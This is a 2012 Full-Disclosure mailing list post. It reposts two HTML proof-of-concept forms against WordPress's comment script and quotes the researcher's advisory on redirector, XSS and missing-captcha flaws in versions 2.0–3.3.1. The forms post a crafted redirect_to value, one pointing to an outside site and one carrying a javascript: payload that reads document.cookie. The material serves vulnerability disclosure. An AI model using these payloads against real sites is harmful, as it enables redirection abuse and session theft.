Hi List, To stop MustLive's desperate act of trying to get visitors (and more backlinks) to his website, I have for those that doesn't want to go to there, just to see the PoC's but actually read them on this mailing list like almost _every other_ Proof of Concept / exploit, made them available below.
Contents of Wordpress Redirector: <html> <head> <title>WordPress Redirector exploit (lol?) (C) 2012 MustLive. [removed]</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-comments-post.php"; method="post"> <input type="hidden" name="author" value="Test" /> <input type="hidden" name="email" value="[email protected]" /> <input type="hidden" name="comment" value="Test" /> <input type="hidden" name="comment_post_ID" value="1" /> <input type="hidden" name="redirect_to" value="http://awebsite.tld"; /> </form> </body> </html> -------------------------------------- Contents of Wordpress XSS: <html> <head> <title>WordPress XSS exploit (lol?) (C) 2012 MustLive. [removed]</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-comments-post.php"; method="post"> <input type="hidden" name="author" value="Test" /> <input type="hidden" name="email" value="[email protected]" /> <input type="hidden" name="comment" value="Test21" /> <input type="hidden" name="comment_post_ID" value="1" /> <input type="hidden" name="redirect_to" value="javascript:alert%28document.cookie%29//" /> </form> </body> </html> -------------------------------------- I don't really have any comments about these "exploits". Best regards, Nemesis 3.0 On Sat, 5 May 2012 16:01:53 +0300, "MustLive" <[email protected]> wrote: > Hello list! > > I want to warn you about security vulnerabilities in WordPress. > > These are Insufficient Anti-automation, Redirector and Cross-Site > Scripting > vulnerabilities. > > ------------------------- > Affected products: > ------------------------- > > Vulnerable are WordPress 2.0 - 3.3.1. > > ---------- > Details: > ---------- > > Already from WP 2.0 there are Insufficient Anti-automation, Redirector and > XSS vulnerabilities in wp-comments-post.php. With IAA I've faced just when > begun using WP in 2006. If the developers fixed vulnerabilities in > previous > two redirectors in WP 2.3, then these vulnerabilities were not fixed even > in > WP 3.3.1 > > IAA (WASC-21): > > Lack of captcha in comment form allows to conduct automated attacks. The > developers still haven't put captcha in WP comments form (from the first > version of engine), which besides IAA attacks, also allowed to conduct > Redirector and XSS attacks. > > By default in WordPress the premoderation is turned on, and also there is > built-in anti-spam filter. But if 10 years ago the premoderation would be > enough, then long ago this mechanism couldn't be considered as sufficient > protection against spam, and anti-spam filter had efficiency less then 1% > - > only few from spam messages he marked as spam. And also these mechanisms > don't protect against below-mentioned attacks. Also plugin Akismet is > bundled with WP, which is "captcha-less" protection against spam. But by > default it's turned off and comparing with captcha it's considered as less > efficient and also doesn't protect against below-mentioned attacks. > > Redirector (URL Redirector Abuse) (WASC-38): > > Exploit: > > [Removed] > > XSS (WASC-08): > > Exploit: > > [Removed] > > XSS attack is possible on different browsers, but it's harder to conduct > then in case of previous two redirectors (via data URI). At IIS web > servers > the redirect is going via Refresh header, and at other web servers - via > Location header. > > Due to nuances of work of this script (filtering of important symbols and > adding of anchor), for execution of JS code it's needed to use tricky > bypass > methods. This complexity exists as with javascript URI, as with combo > variant javascript URI + data URI. > > Reliable captcha protects against IAA, Redirector and XSS vulnerabilities. > > ------------ > Timeline: > ------------ > > 2012.04.26 - disclosed at my site > > Best wishes & regards, > MustLive > Administrator of Websecurity web site > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
